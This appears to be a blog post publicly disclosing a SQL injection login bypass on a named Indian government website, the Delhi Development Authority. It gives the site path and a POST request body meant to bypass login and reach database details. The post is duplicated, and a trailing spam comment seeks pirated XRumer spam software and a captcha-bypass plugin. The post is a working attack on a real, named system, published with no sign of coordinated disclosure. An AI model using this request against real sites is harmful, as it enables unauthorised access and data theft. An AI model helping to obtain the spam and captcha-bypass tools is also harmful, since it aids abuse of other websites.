hello friends,
Only to show how secure gov. websites are, One user used my Notepad Utility to share this report of Vulnerability Inside DELHI DEVELOPMENT AUTHORITY.
I surprised, Then Decide to check whether this is true or not, You Will Also Surprise to know that website has SQLI Issues, AnyOne can easily bypass Login From http://dda.org.in/news/xxxxx.xxxx.
For Developer's:- Validation from client side is not enough, for better security alway's implement server side validation.
Not Only this, can also access Db details, By Using Post Request On Above URL of Following data,
btnSubmit=LOGIN&txtPwd=%Unknowndevice64%&txtUserName=vlxnxbpo&__EVENTARGUMENT=&__EVENTTARGET=
&__EVENTVALIDATION=%2fwEWBAKoz9SSBwKl1bKzCQKd%2b7qdDgLCi9reA%2f8JyAWU3s2qH%2bFHVMZdvhg2aUK3
&__VIEWSTATE=%2fwEPDwULLTEwNTcyMzk5NDlkZO0XsWIGH%2b3ANqG9DeG61OFqN6qo
Hope Authority will Patch this Security Hole Soon, :)
Only to show how secure gov. websites are, One user used my Notepad Utility to share this report of Vulnerability Inside DELHI DEVELOPMENT AUTHORITY.
I surprised, Then Decide to check whether this is true or not, You Will Also Surprise to know that website has SQLI Issues, AnyOne can easily bypass Login From http://dda.org.in/news/xxxxx.xxxx.
For Developer's:- Validation from client side is not enough, for better security alway's implement server side validation.
Not Only this, can also access Db details, By Using Post Request On Above URL of Following data,
btnSubmit=LOGIN&txtPwd=%Unknowndevice64%&txtUserName=vlxnxbpo&__EVENTARGUMENT=&__EVENTTARGET=
&__EVENTVALIDATION=%2fwEWBAKoz9SSBwKl1bKzCQKd%2b7qdDgLCi9reA%2f8JyAWU3s2qH%2bFHVMZdvhg2aUK3
&__VIEWSTATE=%2fwEPDwULLTEwNTcyMzk5NDlkZO0XsWIGH%2b3ANqG9DeG61OFqN6qo
Hope Authority will Patch this Security Hole Soon, :)
WHERE to download torrent XRumer + SocPlugin?
ReplyDeleteIt's really new powerful tool for SEO, I'm need it, so help me please if it possible... Thnkz
At first, I need BlogsPlugin - it's automate blogging with captchas bypass and works with a TOP-10 Blogs platforms!
(it's included in XRumer 12 official package, so please help me to find it! Thank you again!)